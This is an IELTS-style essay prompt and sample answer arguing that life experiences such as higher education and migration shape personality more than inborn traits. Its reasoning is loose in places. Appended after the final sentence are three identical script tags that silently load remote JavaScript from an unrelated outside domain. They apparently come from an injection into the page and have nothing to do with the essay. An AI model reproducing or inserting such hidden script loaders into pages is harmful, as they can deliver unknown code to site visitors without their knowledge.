Research indicates that the characteristics we are born with have much more influence on our personality and development than any experiences we may have in our life. Which do you consider to be the major influence? Give reasons for your answer and include any relevant examples from your own knowledge or experience.

Research indicates that inborn traits exert a stronger influence on our personality and development than life experiences. In this essay, I will explore both aspects and present my opinion.

On the one hand, genetic predispositions significantly shape an individual’s personality and developmental trajectory. It is apparent that an individual’s introverted nature can influence their emotional personality, as supported by studies showing genetic links to traits like shyness or sociability. The evidence of research highlights how inherited melancholic traits affect social interactions and emotional responses, shaping how individuals navigate relationships and tremendous anxiety. Furthermore, the development of low-skilled workers is heavily impacted by the socioeconomic environment of their birthplace. Limited access to education and resources in disadvantaged areas can restrict opportunities, reinforcing the influence of their starting conditions.

However, it seems to me that life experiences play a crucial role either pursuing higher education or migrating, significantly moulding characteristics. These experiences expose individuals to diverse social and cultural environments, fostering adaptability, resilience, and new perspectives. For instance, studying abroad can broaden one’s worldview and enhance interpersonal skills. Additionally, individuals who are self-aware and supported by national programs aimed at improving human resources, such as vocational training or scholarships, can significantly develop their capabilities. Countries like Denmark, with robust mentorship programs, demonstrate how nurturing environments can enhance inborn potential, allowing individuals to refine their skills and character through experience.

In conclusion, I would cite that life experiences, such as pursuing higher education and migrating, have a more profound influence. These experiences foster adaptability, cultural awareness, and personal growth, allowing individuals to transcend their genetic predispositions and actively shape their identities.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
